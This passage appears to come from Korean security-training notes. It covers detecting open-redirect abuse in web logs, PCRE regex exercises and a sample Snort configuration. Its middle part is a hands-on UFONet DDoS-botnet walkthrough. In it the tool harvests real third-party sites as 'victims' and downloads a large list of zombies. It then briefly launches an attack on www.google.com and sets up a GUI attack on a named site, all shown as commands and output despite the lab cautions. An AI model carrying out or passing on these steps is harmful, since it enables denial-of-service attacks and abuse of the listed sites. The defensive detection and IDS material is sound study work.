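    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Query parameters UFONet dorks on (subset of dorks.txt, lower-cased)
REDIRECT_PARAMS = {"url", "uri", "redirect", "redirect_uri", "redir", "goto", "link",
                   "return", "returnurl", "page", "pagina", "open", "openfile",
                   "referer", "pageurl"}

# Constructed sample log (not a real server's log); RFC 5737 test addresses
SAMPLE_LOG = """\
203.0.113.7 - - [23/Aug/2016:10:15:01 +0900] "GET /proxy.php?url=http://www.example.org/path/big.jpg HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Aug/2016:10:15:01 +0900] "GET /proxy.php?url=http://www.example.org/path/big.jpg HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Aug/2016:10:15:02 +0900] "GET /proxy.php?url=http://www.example.org/path/big.jpg?1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [23/Aug/2016:10:15:02 +0900] "GET /proxy.php?url=http://intranet.example.com/logo.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.45 - - [23/Aug/2016:10:15:03 +0900] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.46 - - [23/Aug/2016:10:15:04 +0900] "GET /login?redirect=https://attacker.example.net/ HTTP/1.1" 302 0 "-" "curl/7.47"
"""
OWN_HOSTS = {"www.example.com", "intranet.example.com"}   # assumed names of our own sites


def external_fetch_targets(request_target, own_hosts):
    """Return (param, host, url) for redirect-style params whose value is an external URL."""
    query = urlsplit(request_target).query
    hits = []
    for key, val in parse_qsl(query, keep_blank_values=False):
        if key.lower() not in REDIRECT_PARAMS:
            continue
        u = urlsplit(val)                      # parse_qsl already percent-decoded the value
        if u.scheme in ("http", "https") and u.hostname and u.hostname.lower() not in own_hosts:
            hits.append((key, u.hostname.lower(), val))
    return hits


def detect_reflector_abuse(log_text, own_hosts, threshold=3):
    """Count external hosts requested through our redirect/proxy params; flag repeats."""
    own = {h.lower() for h in own_hosts}
    per_target, per_client = Counter(), Counter()
    samples = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for _key, host, _url in external_fetch_targets(m["target"], own):
            per_target[host] += 1
            per_client[m["ip"]] += 1
            if len(samples[host]) < 3:         # keep a few lines as evidence
                samples[host].append((m["ip"], m["target"]))
    abused = {h: n for h, n in per_target.items() if n >= threshold}
    return {"abused_targets": abused, "clients": per_client, "samples": dict(samples)}


if __name__ == "__main__":
    report = detect_reflector_abuse(SAMPLE_LOG, OWN_HOSTS)
    for host, n in report["abused_targets"].items():
        print(f"{host}: {n} fetches via our redirect/proxy params")
        for ip, target in report["samples"][host]:
            print("   ", ip, target)
```

In production the threshold would be applied per time window (UFONet's `--threads`, `--delay` and `-r` settings above all translate into bursts of near-identical requests), and a single request to a host you do not own is still worth a look, since the endpoint is an open redirect either way; the fix is to stop proxy.php/redirect parameters from accepting arbitrary absolute URLs.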



Features

Auto-update

Clean code (only needs python-pycurl)

Documentation with examples

Web/GUI Interface

Proxy to connect to 'zombies' (ex: tor)

Change HTTP Headers (User-Agent, Referer, Host...)

Configure requests (Timeout, Retries, Delay...)

Search for 'zombies' on google results (using a pattern or a list of dorks)

Test 'Open Redirect' vulnerabilities on 'zombies'

Download/Upload 'zombies' from Community

Inspect a target (HTML objects sizes)

Set a place to 'bit' on a target (ex: big file)

Control number of rounds to attack

Apply cache evasion techniques

Supports GET/POST

Multithreading

Different search engines for dorking

Web interface

Geomapping / Visual data

Order 'zombies' to attack you for benchmarking

etc


(KaliLinux)


① Download the ufonet program

Go to www.sourceforge.net

-> search for the "ufonet" program

-> file names: ufonet-v0.5b.zip

            ufonet-v0.6.zip

-> The GUI Web setup screens differ slightly between version 0.5b and version 0.6.

-> Version 0.6 adds several features.


Site for downloading the ufonet program directly

- https://sourceforge.net/projects/ufonet/?source=directory



② Unpack the ufonet program and check the directories

The ufonet-v0.6.zip file has already been downloaded into the /test1 directory.


# cd /test1

# unzip ufonet-v0.6.zip

-> output omitted


# ls

ufonet/  ufonet-v0.6.zip


# cd ufonet

# ls

README.md  ufonet/


# cd ufonet

# ls

aliens.txt  core/  docs/  dorks.txt  server/  ufonet*  zombies.txt


③ Check how ufonet is used

# ./ufonet

=========================================================================== 

 

888     888 8888888888 .d88888b.  888b    888          888   

888     888 888        d88P Y888b 8888b   888          888   

888     888 888       888     888 88888b  888          888   

888     888 8888888   888     888 888Y88b 888  .d88b.  888888

888     888 888       888     888 888 Y88b888 d8P  Y8b 888   

888     888 888       888     888 888  Y88888 88888888 888   

Y88b. .d88P 888       Y88b. .d88P 888   Y8888 Y8b.     Y88b. 

 'Y88888P'  888        'Y88888P'  888    Y888  'Y8888   'Y8888

 

UFONet - DDoS Botnet via Web Abuse - by psy

 

===========================================================================





# ./ufonet --help

Usage: UFONet.py [options]

 

 UFONet - DDoS Botnet via Web Abuse - by psy

 

Options:

  --version             show program's version number and exit

  -h, --help            show this help message and exit

  -v, --verbose         active verbose on requests

  --update              check for latest stable version

  --check-tor           check to see if Tor is used properly

  --force-yes           set 'YES' to all questions

  --disableisup         disable external check of target's status

  --gui                 run GUI (UFONet Web Interface)

 

  *Configure Request(s)*:

    --proxy=PROXY       Use proxy server (tor: 'http://127.0.0.1:8118')

    --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)

    --referer=REFERER   Use another HTTP Referer header (default SPOOFED)

    --host=HOST         Use another HTTP Host header (default NONE)

    --xforw             Set your HTTP X-Forwarded-For with random IP values

    --xclient           Set your HTTP X-Client-IP with random IP values

    --timeout=TIMEOUT   Select your timeout (default 10)

    --retries=RETRIES   Retries when the connection timeouts (default 1)

    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)

    --delay=DELAY       Delay in seconds between each HTTP request (default 0)

 

  *Search for 'Zombies'*:

    -s SEARCH           Search from a 'dork' (ex: -s 'proxy.php?url=')

    --sd=DORKS          Search from a list of 'dorks' (ex: --sd 'dorks.txt')

    --sn=NUM_RESULTS    Set max number of results for engine (default 10)

    --se=ENGINE         Search engine to use for 'dorking' (default: duck)

    --sa                Search massively using all search engines

 

  *Test Botnet*:

    -t TEST             Update 'zombies' status (ex: -t 'zombies.txt')

    --attack-me         Order 'zombies' to attack you (NAT required!)

 

  *Community*:

    --download-zombies  Download 'zombies' from Community server: Turina

    --upload-zombies    Upload your 'zombies' to Community server: Turina

    --blackhole         Create a 'blackhole' to share your 'zombies'

    --up-to=UPIP        Upload your 'zombies' to a 'blackhole'

    --down-from=DIP     Download your 'zombies' from a 'blackhole'

 

  *Research Target*:

    -i INSPECT          Search for biggest file (ex: -i 'http://target.com')

 

  *Configure Attack(s)*:

    --disable-aliens    Disable 'aliens' web abuse of test services

    --disable-isup      Disable check status 'is target up?'

    -r ROUNDS           Set number of rounds (default: 1)

    -b PLACE            Set place to attack (ex: -b '/path/big.jpg')

    -a TARGET           Start Web DDoS attack (ex: -a 'http(s)://target.com')





④ Search for zombie PCs through the google search engine

The default search engine is duck (used when none is specified).

Several search engines are supported:
Search engines available:
-------------------------
+ duck
+ google
+ bing
+ yahoo
+ yandex
-------------------------

Give one of the supported engines after the --se option.

There are many keywords for finding zombie PCs (see the ufonet/ufonet/dorks.txt file):
----------------------------------------------
proxy.php
?url=
check.cgi?url=
checklink?uri=
validator?uri=
redirect_uri=
redirect=
referer=
pageurl=
returnUrl=
goto=
redir=
openfile=
open=
page=
pagina=
return=
link=
?url=
?uri=
url=
----------------------------------------------

Use a suitable keyword.


# ./ufonet -s 'index.php?url=' --se google

-> (UFONet banner omitted; identical to the one shown above)

 

Searching for 'zombies' using: google

 

======================

 

+Victim found: http://reprints.ygsgroup.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://daimi.au.dk/CPnets/proxy.php?url=

------------

+Victim found: http://business.louisville.edu/cob-it-blog/wp-content/plugins/google-document-embedder/proxy.php?url=

------------

+Victim found: http://www.icap2014.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://judicial.ronny.tw/proxy.php?url=

------------

+Victim found: http://2ch.io/img.theqoo.net/proxy.php?url=

------------

+Victim found: http://www.eurasiam.com/proxy.php?url=

------------

+Victim found: http://www.sltrib.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

 

======================

+Possible Zombies: 8

======================

 

Wanna check if they are valid zombies? (Y/n)

Y

Are 'they' alive? :-) (HEAD Check):

===================================

Trying: 8

---------------------

Zombie: judicial.ronny.tw

Status: Ok [200]

----------

Zombie: reprints.ygsgroup.com

Status: Ok [200]

----------

Zombie: www.icap2014.com

Status: Ok [200]

----------

Zombie: 2ch.io

Status: Ok [200]

----------

Zombie: www.sltrib.com

Status: Ok [200]

----------

Zombie: www.eurasiam.com

Status: Ok [200]

----------

Zombie: daimi.au.dk

Status: Ok [200]

----------

Zombie: business.louisville.edu http://business.louisville.edu/cob-it-blog/wp-content/plugins/google-document-embedder/proxy.php?url=

Status: Not Allowed [0]

----------

==================

OK: 7 Fail: 1

==================

======================

Checking for payloads:

======================

Trying: 7

---------------------


==================

OK: 3 Fail: 4

==================

==================

Army of 'zombies'

==================

------------------

Total Army: 3

------------------

Wanna update your army (Y/n)Y

-------------------------

 

[Info] - Botnet updated! ;-)


⑤ Download the list of zombies from the community server (Turina)

# ./ufonet --download-zombies

=========================================================================== 

 

888     888 8888888888 .d88888b.  888b    888          888   

888     888 888        d88P Y888b 8888b   888          888   

888     888 888       888     888 88888b  888          888   

888     888 8888888   888     888 888Y88b 888  .d88b.  888888

888     888 888       888     888 888 Y88b888 d8P  Y8b 888   

888     888 888       888     888 888  Y88888 88888888 888   

Y88b. .d88P 888       Y88b. .d88P 888   Y8888 Y8b.     Y88b. 

 'Y88888P'  888        'Y88888P'  888    Y888  'Y8888   'Y8888

 

UFONet - DDoS Botnet via Web Abuse - by psy

 

===========================================================================

 

Downloading list of 'zombies' from server ...

 

======================

 

Trying 'blackhole': 176.28.23.46

 

Vortex: IS READY!

------------

 

[Info] - Congratulations!. Total of 'zombies' downloaded: 1716

------------

 

Wanna merge ONLY new 'zombies' to your army (Y/n) Y

-------------------------

 

[Info] - Botnet updated! ;-)


⑥ Run the attack job using the ufonet CLI command

# ./ufonet -a http://www.google.com

=========================================================================== 

 

888     888 8888888888 .d88888b.  888b    888          888   

888     888 888        d88P Y888b 8888b   888          888   

888     888 888       888     888 88888b  888          888   

888     888 8888888   888     888 888Y88b 888  .d88b.  888888

888     888 888       888     888 888 Y88b888 d8P  Y8b 888   

888     888 888       888     888 888  Y88888 88888888 888   

Y88b. .d88P 888       Y88b. .d88P 888   Y8888 Y8b.     Y88b. 

 'Y88888P'  888        'Y88888P'  888    Y888  'Y8888   'Y8888

 

UFONet - DDoS Botnet via Web Abuse - by psy

 

===========================================================================

Attacking:  http://www.google.com

=======================================================

 

=====================

Round: 'Is target up?'

=====================

[Info] From here: YES

---------------------

[Info] From exterior: YES

---------------------

[Info] Your target looks ONLINE!. Wanna start a DDoS attack? (y/N)

y        <---- (Caution) Do not choose 'y' in the lab. Always choose 'n'.

 

 

==========================================

Starting round: 1  of  1

==========================================

..... (omitted) .....

<CTRL + Z>

[1]+  Stopped                 ./ufonet -a http://www.google.com

-> Only check the attack briefly, then stop it.

-> Do not keep the attack running.


# kill %1

[1]+  Stopped                 ./ufonet -a http://www.google.com


# jobs

[1]+  Terminated              ./ufonet -a http://www.google.com


# jobs

#



⑦ Run the ufonet GUI tool to carry out the attack job

# ./ufonet --gui

Select <START MOTHERSHIP!>.


Hover the mouse pointer over <Wormhole>.


Hovering over <Wormhole> brings up a number of menus.


Select <Botnet> among them.


Select <List 'zombies'> and scroll to the bottom of the screen to check the list.


Select <Attack>.


Set your target:

     http://www.soldesk.com

Set place to attack:

      /path/big.jpg


(Caution) Never press START.






⑧ Botnet/DDoS Attack - Norse Live Footage REALTIME 1 APRIL 2015 LIVE


Visit the following website.

http://map.norsecorp.com/

[Reference URLs]

How to create botnets for DDoS attacks (2015) using Kali linux

- https://www.youtube.com/watch?v=xCqHxz4ufvo


Botnet / DDoS Attack - Norse Live Footage REALTIME 1 APRIL 2015 LIVE

- https://www.youtube.com/watch?v=quGv7Bf5BiY

- http://map.norsecorp.com/





                PCRE(Perl Compatible Regular Expression)



1. What is a regular expression?


A regular expression is a formal language used to describe a set of strings that follow a particular rule.

Regular expressions are supported by many text editors and programming languages for searching and replacing strings.




2. Preparation for the exercises (required programs, for Windows)


Download and install a suitable program.

- (paid) RegexBuddy (http://www.regexbuddy.com/)

or

- (free) Rad.RegexDesigner (http://www.radsoftware.com.au/regexdesigner/)

        -> use the shared directory



3. Metacharacters: types and meanings


■ Metacharacter: .

Matches any single character except "\n".
To match any character including "\n", use the pattern '[.\n]'.


[Exercise] .

Expression  h.t

String  hat halt hit heat hot




■ Metacharacter: ?

The character immediately before ? is matched 0 or 1 times.


[Exercise] 

Expression  ha?t

String  ht hit hat hot haat hut haaaaat



■ Metacharacter: *

The preceding character is repeated 0 or more times.


[Exercise] 

Expression  ha*t

String  ht hit hat hot haat hut haaaat


■ Metacharacter: +

The preceding character is repeated 1 or more times.


[Exercise] 

Expression  ha+t

String  ht hit hat hot haat hut haaaaat



■ Metacharacter: ^

^ marks the very beginning (start position) of a line.

Matches the start position of the input string. If the Multiline option is set, it also matches the position before a '\n' or '\r'.


[Exercise] 

Expression  ^h.t

String  hat hit hot



■ Metacharacter: $

$ marks the very end (end position) of a line.

Matches the end position of the input string. If the Multiline option is set, it also matches the position after a '\n' or '\r'.


[Exercise] 

Expression  h.t$

String  hat hit hot



■ Metacharacter: (pattern)

Groups a pattern within the regex.

Bundles a specific pattern so that it can be combined with repetition operators and the like.

Also used when only one of several alternatives should be matched.


[Exercise] 

Expression  ba(na)*

String  ba na bana banana nana bananana


Expression  ba(na)+

String  ba na bana banana nana bananana



■ Metacharacter: (|)

Selects one of the values on either side of the | symbol.

Within a parenthesized group, matches one of the several patterns separated by |.


[Exercise] 

Expression  (eg|sa|be)g

String  egg eng sag sig beg bag



■ Metacharacter: {n}

Repeats the immediately preceding character exactly n times.


[Exercise] 

Expression  ha{2}t

String  ht hit hat hot haat hut haaaaat



■ Metacharacter: {n,}

Repeats the immediately preceding character n or more times.

{0,} means the same as the asterisk (*).

{1,} means the same as the plus sign (+).

{0,1} means the same as the question mark (?).


[Exercise] 

Expression  ha{2,}t

String  ht hit hat hot haat hut haaaaat



■ Metacharacter: {n,m}

Repeats the immediately preceding character at least n and at most m times.


[Exercise] 

Expression  ha{2,4}t

String  ht hat haat haaat haaaat haaaaat





■ Character set: []

Matches one of the characters inside the brackets.

[abc]   one of a, b, c

[a-z]   one lowercase letter

[0-9]   one digit

[a-zA-Z] one lowercase or uppercase letter


[Exercise] 

Expression  h[aiu]t

String  hat het hit hot hut



■ Metacharacter: [^xyz]

[^] matches one character other than those listed inside the brackets.

[^abc]  one character other than a, b, c

[^a-z]  one character other than a lowercase letter

[^0-9]  one character other than a digit

[^a-zA-Z]       one character other than a lowercase or uppercase letter


[Exercise] 

Expression  h[^aiu]t

String  hat het hit hot hut
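As an added example (not part of the original page or of Snort), the following Python runs every exercise above with the `re` module, which agrees with PCRE for the metacharacters used here, and also compiles a regex written in the `/pattern/flags` form that Snort's `pcre` rule option uses, mapping the standard i, s, m and x modifiers. The `compile_snort_pcre` helper is this example's own.

```python
"""Run this page's PCRE metacharacter exercises and Snort-style pcre options with Python's re."""
import re

# (pattern, exercise string) pairs exactly as given in the exercises above.
# Python's re engine agrees with PCRE for every construct used here:
# . ? * + ^ $ ( ) | {n} {n,} {n,m} [..] [^..]
EXERCISES = [
    (r"h.t",         "hat halt hit heat hot"),
    (r"ha?t",        "ht hit hat hot haat hut haaaaat"),
    (r"ha*t",        "ht hit hat hot haat hut haaaat"),
    (r"ha+t",        "ht hit hat hot haat hut haaaaat"),
    (r"^h.t",        "hat hit hot"),
    (r"h.t$",        "hat hit hot"),
    (r"ba(na)*",     "ba na bana banana nana bananana"),
    (r"ba(na)+",     "ba na bana banana nana bananana"),
    (r"(eg|sa|be)g", "egg eng sag sig beg bag"),
    (r"ha{2}t",      "ht hit hat hot haat hut haaaaat"),
    (r"ha{2,}t",     "ht hit hat hot haat hut haaaaat"),
    (r"ha{2,4}t",    "ht hat haat haaat haaaat haaaaat"),
    (r"h[aiu]t",     "hat het hit hot hut"),
    (r"h[^aiu]t",    "hat het hit hot hut"),
]


def find_matches(pattern, text, flags=0):
    """Return every whole match (group 0), left to right, non-overlapping.

    re.findall would return only the captured group for ba(na)*, so finditer is used.
    """
    return [m.group(0) for m in re.finditer(pattern, text, flags)]


def run_exercises(exercises=EXERCISES):
    """Map each exercise pattern to the substrings it matches in its exercise string."""
    return {pattern: find_matches(pattern, text) for pattern, text in exercises}


# Snort writes a regex in a rule as pcre:"/pattern/flags". Only the PCRE-standard
# modifiers i, s, m and x are mapped here; Snort's own buffer modifiers are rejected.
_SNORT_FLAGS = {"i": re.IGNORECASE, "s": re.DOTALL, "m": re.MULTILINE, "x": re.VERBOSE}


def compile_snort_pcre(option):
    """Turn the body of a Snort pcre option, e.g. '/h[aiu]t/i', into a compiled regex."""
    if not option.startswith("/") or option.count("/") < 2:
        raise ValueError("expected /pattern/flags, got: " + option)
    body, _, modifiers = option[1:].rpartition("/")
    flags = 0
    for ch in modifiers:
        if ch not in _SNORT_FLAGS:
            raise ValueError("unsupported pcre modifier: " + ch)
        flags |= _SNORT_FLAGS[ch]
    return re.compile(body, flags)


if __name__ == "__main__":
    for pattern, matched in run_exercises().items():
        print(f"{pattern:14} -> {matched}")
    print(compile_snort_pcre("/h[aiu]t/i").findall("HAT het Hit hot hut"))  # ['HAT', 'Hit', 'hut']
```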









snort architecture & snort rules



The following content is taken from the book "기업정보호전문가 양성과정 시스템 정보보안 기술 실무" (Enterprise Information Security Specialist Training Course: System Information Security Technical Practice).




How to install and operate Snort



Installing Snort on CentOS 6.X

- Reference page: https://www.snort.org/#get-started

- Reference page: http://www.youtube.com/watch?v=DYBfCyd6cC0





[Reference] snort.conf example file (http://labs.snort.org/snort/2956/snort.conf)


#--------------------------------------------------

#   VRT Rule Packages Snort.conf

#

#   For more information visit us at:

#    http://www.snort.org                   Snort Website

#    http://vrt-blog.snort.org/    Sourcefire VRT Blog

#

#     Mailing list Contact:      snort-sigs@lists.sourceforge.net

#     False Positive reports:    fp@sourcefire.com

#     Snort bugs:                bugs@snort.org

#

#     Compatible with Snort Versions:

#     VERSIONS : 2.9.5.6

#

#     Snort build options:

#    OPTIONS : --enable-gre --enable-mpls --enable-targetbased --enable-ppm --enable-perfprofiling

# --enable-zlib --enable-active-response --enable-normalizer --enable-reload --enable-react

# --enable-flexresp3

#

#     Additional information:

#     This configuration file enables active response, to run snort in

#     test mode -T you are required to supply an interface -i <interface>

#     or test mode will fail to fully validate the configuration and

#     exit with a FATAL error

#--------------------------------------------------

 

###################################################

# This file contains a sample snort configuration.

# You should take the following steps to create your own custom configuration:

#

#  1) Set the network variables.

#  2) Configure the decoder

#  3) Configure the base detection engine

#  4) Configure dynamic loaded libraries

#  5) Configure preprocessors

#  6) Configure output plugins

#  7) Customize your rule set

#  8) Customize preprocessor and decoder rule set

#  9) Customize shared object rule set

###################################################

 

###################################################

# Step #1: Set the network variables.  For more information, see README.variables

###################################################

 

# Setup the network addresses you are protecting

ipvar HOME_NET any

 

# Set up the external network addresses. Leave as "any" in most situations

ipvar EXTERNAL_NET any

 

# List of DNS servers on your network

ipvar DNS_SERVERS $HOME_NET

 

# List of SMTP servers on your network

ipvar SMTP_SERVERS $HOME_NET

 

# List of web servers on your network

ipvar HTTP_SERVERS $HOME_NET

 

# List of sql servers on your network

ipvar SQL_SERVERS $HOME_NET

 

# List of telnet servers on your network

ipvar TELNET_SERVERS $HOME_NET

 

# List of ssh servers on your network

ipvar SSH_SERVERS $HOME_NET

 

# List of ftp servers on your network

ipvar FTP_SERVERS $HOME_NET

 

# List of sip servers on your network

ipvar SIP_SERVERS $HOME_NET

 

# List of ports you run web servers on

portvar HTTP_PORTS [36,80,81,82,83,84,85,86,87,88,89,90,311,383,555,591,593,631,801,808,818,901,972,1158,1220,1414,1533,1741,1830,1942,2231,2301,2381,2578,2809,2980,3029,3037,3057,3128,3443,3702,4000,4343,4848,5000,5117,5250,5600,6080,6173,6988,7000,7001,7071,7144,7145,7510,7770,7777,7778,7779,8000,8008,8014,8028,8080,8081,8082,8085,8088,8090,8118,8123,8180,8181,8222,8243,8280,8300,8333,8344,8500,8509,8800,8888,8899,8983,9000,9060,9080,9090,9091,9111,9290,9443,9999,10000,11371,12601,13014,15489,29991,33300,34412,34443,34444,41080,44449,50000,50002,51423,53331,55252,55555,56712]

 

# List of ports you want to look for SHELLCODE on.

portvar SHELLCODE_PORTS !80

 

# List of ports you might see oracle attacks on

portvar ORACLE_PORTS 1024:

 

# List of ports you want to look for SSH connections on:

portvar SSH_PORTS 22

 

# List of ports you run ftp servers on

portvar FTP_PORTS [21,2100,3535]

 

# List of ports you run SIP servers on

portvar SIP_PORTS [5060,5061,5600]

 

# List of file data ports for file inspection

portvar FILE_DATA_PORTS [$HTTP_PORTS,110,143]

 

# List of GTP ports for GTP preprocessor

portvar GTP_PORTS [2123,2152,3386]

 

# other variables, these should not be modified

ipvar AIM_SERVERS [64.12.24.0/23,64.12.28.0/23,64.12.161.0/24,64.12.163.0/24,64.12.200.0/24,205.188.3.0/24,205.188.5.0/24,205.188.7.0/24,205.188.9.0/24,205.188.153.0/24,205.188.179.0/24,205.188.248.0/24]

 

# Path to your rules files (this can be a relative path)

# Note for Windows users:  You are advised to make this an absolute path,

# such as:  c:\snort\rules

var RULE_PATH ../rules

var SO_RULE_PATH ../so_rules

var PREPROC_RULE_PATH ../preproc_rules

 

# If you are using reputation preprocessor set these

var WHITE_LIST_PATH ../rules

var BLACK_LIST_PATH ../rules
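The ipvar/portvar lines in Step #1 above use a small grammar (single values, lo:hi ranges, ! negation, $NAME references and [a,b,...] lists) that every rule later refers to, so a wrong HOME_NET or port list silently blinds the sensor. As an added example, not part of snort.conf or the Snort project, the following Python resolves such definitions from a constructed excerpt (HOME_NET given a sample range instead of any, HTTP_PORTS shortened) and checks whether a port or address falls inside a variable; it assumes IPv4 addresses and no lists nested inside lists.

```python
"""Resolve snort.conf Step #1 ipvar/portvar definitions and test ports/addresses against them."""
import ipaddress
import re

ALL_PORTS = frozenset(range(65536))
ANY_NET = ipaddress.ip_network("0.0.0.0/0")   # assumption: IPv4 only in this example

# Constructed excerpt in the syntax of the Step #1 variables above. HOME_NET gets a real
# range instead of "any", and HTTP_PORTS is shortened, so that the checks mean something.
SNORT_CONF_EXCERPT = """\
# Setup the network addresses you are protecting
ipvar HOME_NET [192.168.10.0/24,10.0.0.0/8]
ipvar EXTERNAL_NET !$HOME_NET
ipvar HTTP_SERVERS $HOME_NET
ipvar AIM_SERVERS [64.12.24.0/23,64.12.28.0/23,205.188.3.0/24]
portvar HTTP_PORTS [36,80,81,8080,8443]
portvar SHELLCODE_PORTS !80
portvar ORACLE_PORTS 1024:
portvar FTP_PORTS [21,2100,3535]
portvar FILE_DATA_PORTS [$HTTP_PORTS,110,143]
"""

_VAR_LINE = re.compile(r"^\s*(ipvar|portvar)\s+(\w+)\s+(\S+)\s*$")

def _list_items(expr):
    """Items of a [a,b,...] list; lists nested inside lists are not handled (assumption)."""
    return [item.strip() for item in expr[1:-1].split(",") if item.strip()]

def expand_ports(expr, portvars):
    """Expand a portvar value (port, lo:hi, !x, $REF or [a,b,...]) to a frozenset of ports."""
    expr = expr.strip()
    if expr.startswith("!"):                     # negation: every port except these
        return ALL_PORTS - expand_ports(expr[1:], portvars)
    if expr.startswith("[") and expr.endswith("]"):
        return frozenset().union(*(expand_ports(i, portvars) for i in _list_items(expr)))
    if expr.startswith("$"):                     # reference to an earlier portvar
        return portvars[expr[1:]]                # KeyError = undefined variable
    if ":" in expr:                              # open or closed range, e.g. 1024:
        low, high = expr.split(":", 1)
        return frozenset(range(int(low or 0), int(high or 65535) + 1))
    return frozenset({int(expr)})

def expand_ips(expr, ipvars):
    """Expand an ipvar value to (positives, negatives): an address belongs to the set when
    it lies inside some positive network and inside none of the negative ones."""
    expr = expr.strip()
    if expr.startswith("!"):                     # !X = everything except X
        pos, neg = expand_ips(expr[1:], ipvars)
        if neg:
            raise ValueError("negating a set that has exclusions is not supported: " + expr)
        return [ANY_NET], pos
    if expr.startswith("[") and expr.endswith("]"):
        pos, neg = [], []
        for item in _list_items(expr):
            p, n = expand_ips(item, ipvars)
            if p == [ANY_NET] and n:             # a negated item inside a list excludes it
                neg += n
            else:
                pos += p
                neg += n
        return (pos or [ANY_NET]), neg
    if expr.startswith("$"):
        pos, neg = ipvars[expr[1:]]
        return list(pos), list(neg)
    if expr == "any":
        return [ANY_NET], []
    return [ipaddress.ip_network(expr, strict=False)], []

def parse_conf(text):
    """Collect ipvar/portvar definitions in file order, resolving $REFs to earlier ones."""
    ipvars, portvars = {}, {}
    for line in text.splitlines():
        match = _VAR_LINE.match(line.split("#", 1)[0])   # drop comments
        if not match:
            continue
        kind, name, value = match.groups()
        if kind == "portvar":
            portvars[name] = expand_ports(value, portvars)
        else:
            ipvars[name] = expand_ips(value, ipvars)
    return ipvars, portvars

def port_matches(name, port, portvars):
    """True when `port` is covered by the named portvar."""
    return port in portvars[name]

def ip_matches(name, addr, ipvars):
    """True when `addr` is covered by the named ipvar."""
    address = ipaddress.ip_address(addr)
    pos, neg = ipvars[name]
    return any(address in net for net in pos) and not any(address in net for net in neg)

if __name__ == "__main__":
    ipvars, portvars = parse_conf(SNORT_CONF_EXCERPT)
    print(sorted(portvars["FILE_DATA_PORTS"]))                 # [36, 80, 81, 110, 143, 8080, 8443]
    print(port_matches("SHELLCODE_PORTS", 80, portvars))       # False
    print(ip_matches("EXTERNAL_NET", "192.168.10.5", ipvars))  # False
```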

 

###################################################

# Step #2: Configure the decoder.  For more information, see README.decode

###################################################

 

# Stop generic decode events:

config disable_decode_alerts

 

# Stop Alerts on experimental TCP options

config disable_tcpopt_experimental_alerts

 

# Stop Alerts on obsolete TCP options

config disable_tcpopt_obsolete_alerts

 

# Stop Alerts on T/TCP alerts

config disable_tcpopt_ttcp_alerts

 

# Stop Alerts on all other TCPOption type events:

config disable_tcpopt_alerts

 

# Stop Alerts on invalid ip options

config disable_ipopt_alerts

 

# Alert if value in length field (IP, TCP, UDP) is greater than the length of the packet

# config enable_decode_oversized_alerts

 

# Same as above, but drop packet if in Inline mode (requires enable_decode_oversized_alerts)

# config enable_decode_oversized_drops

 

# Configure IP / TCP checksum mode

config checksum_mode: all

 

# Configure maximum number of flowbit references.  For more information, see README.flowbits

# config flowbits_size: 64

 

# Configure ports to ignore

# config ignore_ports: tcp 21 6667:6671 1356

# config ignore_ports: udp 1:17 53

 

# Configure active response for non inline operation. For more information, see README.active

# config response: eth0 attempts 2

 

# Configure DAQ related options for inline operation. For more information, see README.daq

#

# config daq: <type>

# config daq_dir: <dir>

# config daq_mode: <mode>

# config daq_var: <var>

#

# <type> ::= pcap | afpacket | dump | nfq | ipq | ipfw

# <mode> ::= read-file | passive | inline

# <var> ::= arbitrary <name>=<value passed to DAQ

# <dir> ::= path as to where to look for DAQ module so's

 

# Configure specific UID and GID to run snort as after dropping privs. For more information see snort -h command line options

#

# config set_gid:

# config set_uid:

 

# Configure default snaplen. Snort defaults to MTU of in use interface. For more information see README

#

# config snaplen:

#

 

# Configure default bpf_file to use for filtering what traffic reaches snort. For more information see snort -h command line options (-F)

#

# config bpf_file:

#

 

# Configure default log directory for snort to log to.  For more information see snort -h command line options (-l)

#

# config logdir:

 

 

###################################################

# Step #3: Configure the base detection engine.  For more information, see  README.decode

###################################################

 

# Configure PCRE match limitations

config pcre_match_limit: 3500

config pcre_match_limit_recursion: 1500

 

# Configure the detection engine  See the Snort Manual, Configuring Snort - Includes - Config

config detection: search-method ac-split search-optimize max-pattern-len 20

 

# Configure the event queue.  For more information, see README.event_queue

config event_queue: max_queue 8 log 5 order_events content_length

 

###################################################

## Configure GTP if it is to be used.

## For more information, see README.GTP

####################################################

 

# config enable_gtp

 

###################################################

# Per packet and rule latency enforcement

# For more information see README.ppm

###################################################

 

# Per Packet latency configuration

#config ppm: max-pkt-time 250, \

#   fastpath-expensive-packets, \

#   pkt-log

 

# Per Rule latency configuration

#config ppm: max-rule-time 200, \

#   threshold 3, \

#   suspend-expensive-rules, \

#   suspend-timeout 20, \

#   rule-log alert

 

###################################################

# Configure Perf Profiling for debugging

# For more information see README.PerfProfiling

###################################################

 

#config profile_rules: print all, sort avg_ticks

#config profile_preprocs: print all, sort avg_ticks

 

###################################################

# Configure protocol aware flushing

# For more information see README.stream5

###################################################

config paf_max: 16000

 

###################################################

# Step #4: Configure dynamic loaded libraries.

# For more information, see Snort Manual, Configuring Snort - Dynamic Modules

###################################################

 

# path to dynamic preprocessor libraries

dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/

 

# path to base preprocessor engine

dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so

 

# path to dynamic rules libraries

dynamicdetection directory /usr/local/lib/snort_dynamicrules

 

###################################################

# Step #5: Configure preprocessors

# For more information, see the Snort Manual, Configuring Snort - Preprocessors

###################################################

 

# GTP Control Channel Preprocessor. For more information, see README.GTP

# preprocessor gtp: ports { 2123 3386 2152 }

 

# Inline packet normalization. For more information, see README.normalize

# Does nothing in IDS mode

